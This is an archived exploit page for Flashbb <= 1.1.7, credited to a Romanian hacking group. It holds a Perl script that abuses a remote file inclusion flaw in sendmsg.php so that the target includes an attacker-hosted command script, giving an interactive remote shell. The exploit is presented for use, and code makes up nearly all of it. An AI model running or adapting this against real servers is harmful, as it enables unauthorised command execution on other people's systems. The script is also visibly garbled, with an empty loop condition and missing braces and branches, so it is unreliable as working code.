TUCoPS :: Web BBS :: etc :: tb11556.htm

Flashbb <= 1.1.7 - Remote File Inclusion Exploit
Flashbb <= 1.1.7 - Remote File Inclusion Exploit
Flashbb <= 1.1.7 - Remote File Inclusion Exploit

# Flashbb <= 1.1.7 - Remote File Inclusion Exploit
# Url: http://rapidshare.com/files/41426468/FlashBB_AaeDueHFcu.zip 
# Exploit:
# http://site.com/[path]/phpbb/sendmsg.php?phpbb_root_path=[Evil_Script>:] 
# (c)oded and f0und3d by kw3rln 
# Romanian Security Team .: hTTp://RSTZONE.NET :. 
# greetz to all RST [rstzone.net] MEMBERZ

use LWP::Simple;

print "...........................[RST]...............................\n";
print ".  .\n";
print ".        Flashbb <= 1.1.7 - Remote File Inclusion Exploit .\n";
print ".  .\n";
print "...............................................................\n";
print ". Romanian Security Team -> hTTp://RSTZONE.NET .\n"; 
print ". [c]oded by Kw3rLN - office@rosecuritygroup.net .\n"; 
print "...............................................................\n\n";

my $kw3,$path,$shell,$conexiune,$cmd,$data ;

if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
$shell = $ARGV[1];

$path = $path."/phpbb/sendmsg.php";

sub usage(){
print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; 
print "Example : perl $0 http://site.com/cmd.txt\n\n"; 
      print 'Shell    : ';

while ()
print "[kw3rln].[rst] :~\$ ";
if ($cmd eq "exit") { exit(0);}

$kw3 = $path."?phpbb_root_path=".$shell."?&cmd=".$cmd;
if ($cmd eq "")
 { print "Enter your command !\n"; }
 { $data=get($kw3); print $data ; }

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